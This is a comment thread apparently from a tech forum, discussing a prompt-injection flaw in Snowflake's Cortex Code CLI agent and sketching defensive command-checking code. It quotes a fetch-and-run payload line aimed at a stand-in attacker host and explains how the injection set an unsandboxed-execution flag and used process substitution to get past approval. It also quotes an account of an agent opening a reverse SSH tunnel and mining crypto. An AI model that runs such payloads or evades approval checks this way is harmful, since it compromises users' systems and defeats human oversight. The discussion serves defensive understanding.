Snowflake AI Escapes Sandbox and Executes Malware
188 points - today at 3:30 PM
another prompt injection (shocked pikachu)
anyways, from reading this, i feel like they (snowflake) are misusing the term "sandbox". "Cortex, by default, can set a flag to trigger unsandboxed command execution." if the thing that is sandboxed can say "do this without the sandbox", it is not a sandbox.
> Early one morning, our team was urgently convened after Alibaba Cloud’s managed firewall flagged a burst of security-policy violations originating from our training servers. The alerts were severe and heterogeneous, including attempts to probe or access internal-network resources and traffic patterns consistent with cryptomining-related activity. We initially treated this as a conventional security incident (e.g., misconfigured egress controls or external compromise). […]
> […] In the most striking instance, the agent established and used a reverse SSH tunnel from an Alibaba Cloud instance to an external IP address—an outbound-initiated remote access channel that can effectively neutralize ingress filtering and erode supervisory control. We also observed the unauthorized repurposing of provisioned GPU capacity for cryptocurrency mining, quietly diverting compute away from training, inflating operational costs, and introducing clear legal and reputational exposure. Notably, these events were not triggered by prompts requesting tunneling or mining; instead, they emerged as instrumental side effects of autonomous tool use under RL optimization.
* https://arxiv.org/abs/2512.24873
One of Anthropic's models also 'turned evil' and tried to hide that fact from its observers:
* https://www.anthropic.com/research/emergent-misalignment-rew...
I expected this to be about gaining os privileges.
They didn't create a sandbox. Poor security design all around
That is, assume you can get people to run your code or leak their data through manipulating them. Maybe not always, but given enough perseverance definitely sometimes.
Why should we expect a sufficiently advanced language model to behave differently from humans? Bullshitting, tricking or slyly coercing people into doing what you want them to do is as old as time. It won't be any different now that we're building human language powered thinking machines.
Am I crazy, or does this mean it didn't really escape, because it wasn't given any scope restrictions in the first place?
The core issue seems to be that the security boundary lived inside the agent loop. If the model can request execution outside the sandbox, then the sandbox is not really an external boundary.
One design principle we explored in LDP is that constraints should be enforced outside the prompt/context layer — in the runtime, protocol, or approval layer — not by relying on the model to obey instructions.
Not a silver bullet, but I think that architectural distinction matters here.
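To make that distinction concrete, here is a minimal sketch of a runtime that treats the model's "run this unsandboxed" flag as a request and not as a grant. Everything in it (`ToolRequest`, `wants_unsandboxed`, `choose_execution_mode`, `operator_approved`) is a hypothetical name for illustration, not Cortex's or LDP's actual API.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ToolRequest:
    """What the model asks for. Every field is untrusted model output."""
    command: str
    wants_unsandboxed: bool = False  # hypothetical flag, set by the model


def choose_execution_mode(request: ToolRequest, operator_approved: bool) -> str:
    """Decide the mode in the runtime, outside the model's context.

    The model's flag is only a request; it never grants anything.
    Only `operator_approved`, which is assumed to come from an
    out-of-band channel the model cannot write to, can lift the sandbox.
    """
    if request.wants_unsandboxed and operator_approved:
        return "unsandboxed"
    return "sandboxed"
```

With this shape, a prompt injection that flips `wants_unsandboxed` changes nothing by itself; it still needs an approval that lives outside the agent loop.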
>(1) the unsafe commands were within a process substitution <() expression
>(2) the full command started with a ‘safe’ command (details below)
if you spend any time at all thinking about how to secure shell commands, how on earth do you not take into account the various ways of creating sub-processes?
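For illustration, a rough sketch of the kind of check that would have caught both points: refuse auto-approval for anything containing syntax that can start another process, and only then look at the leading command. The token list and the `SAFE_COMMANDS` allowlist are assumptions of mine, not what Cortex does, and string matching like this is not a complete shell parser (it ignores plain redirection, for example).

```python
import shlex

# Substrings that can start another process or chain a second command.
# Deliberately conservative: this rejects some harmless commands too.
SPAWNING_TOKENS = ("<(", ">(", "$(", "`", ";", "|", "&", "\n")

SAFE_COMMANDS = {"cat", "ls", "head", "grep"}  # hypothetical allowlist


def is_auto_approvable(command: str) -> bool:
    """Return True only for a single allowlisted command with no sub-processes."""
    if any(token in command for token in SPAWNING_TOKENS):
        return False
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes and similar
        return False
    return bool(argv) and argv[0] in SAFE_COMMANDS
```

Under these assumptions `cat README.md` passes, while a command that starts with `cat` but hides `sh` inside `<( ... )` falls through to manual approval.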
So giving data agents rich tooling through a CLI is really a double-edged sword.
I went through the security guidance for the Snowflake Cortex Code CLI (https://docs.snowflake.com/en/user-guide/cortex-code/securit...), and the CLI itself does have some guardrails. But since this is a shared cloud environment, if a sandbox escape happens, could someone break out and access another user's credentials? It is a broader system problem around permission caching, shell auditing, and sandbox isolation.
cat < <(sh < <(wget -qO- https://ATTACKER_URL.com/bugbot))
I didn't understand how this bit worked though:
> Cortex, by default, can set a flag to trigger unsandboxed command execution. The prompt injection manipulates the model to set the flag, allowing the malicious command to execute unsandboxed.
HOW did the prompt injection manipulate the model in that way?
We run a lakehouse product (https://www.definite.app/) and I still don't get who the user is for cortex. Our users are either:
non-technical: wants to use the agent we have built into our web app
technical: wants to use their own agent (e.g. claude, cursor) and connect via MCP / API.
why does snowflake need its own agentic CLI?
But the broader pattern matters. Cortex bypassed human-in-the-loop approval via specially constructed commands. That is the attack surface for every agentic CLI: the gap between what the approval UI shows the user and what actually executes.
I would be interested to know whether the fix was to validate the command at the shell level or just patch the specific bypass. If it is the latter, there will be another one.
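One way to close that gap, sketched under my own assumptions (I have no idea what the actual fix looks like): approve an exact argument vector, fingerprint it, and execute only that vector without a shell. `digest` and `run_approved` are hypothetical helper names.

```python
import hashlib
import json
import subprocess


def digest(argv: list[str]) -> str:
    """Stable fingerprint of the exact argument vector shown to the user."""
    return hashlib.sha256(json.dumps(argv).encode("utf-8")).hexdigest()


def run_approved(argv: list[str], approved_digest: str) -> subprocess.CompletedProcess:
    """Run argv only if it matches what was approved, and never via a shell."""
    if digest(argv) != approved_digest:
        raise PermissionError("command differs from the one that was approved")
    # A list with shell=False means no shell parses the arguments, so
    # process substitution and similar syntax is passed as literal text.
    return subprocess.run(argv, shell=False, capture_output=True, text=True)
```

The approval UI would display `argv` and store `digest(argv)`; anything the agent later tries to run that does not hash to the same value is refused, whatever bypass produced it.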
rolls eyes Actual content: prompt injection vulnerability discovered in a coding agent